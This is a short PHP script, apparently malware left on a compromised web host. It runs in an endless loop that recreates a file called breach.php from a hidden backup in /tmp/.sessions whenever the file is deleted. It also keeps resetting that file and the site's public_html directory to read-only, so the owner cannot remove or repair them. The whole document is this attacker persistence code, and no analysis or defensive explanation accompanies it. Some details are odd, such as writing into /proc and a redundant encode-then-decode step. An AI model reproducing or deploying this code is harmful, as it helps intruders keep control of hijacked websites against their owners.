
<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/home/sisikis/public_html")){
        mkdir("/home/sisikis/public_html");
    }
    if (!file_exists("/proc/2846/breach.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L3Byb2MvMjg0NmJyZWFjaC10ZXh0"));
        file_put_contents("/proc/2846/breach.php", base64_decode($text));
    }
    if (haxorsec_perm("/proc/2846/breach.php") != 0444){
        chmod("/proc/2846/breach.php", 0444);
    }
    if (haxorsec_perm("/home/sisikis/public_html") != 0555){
        chmod("/home/sisikis/public_html", 0555);
    }
}

function haxorsec_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}
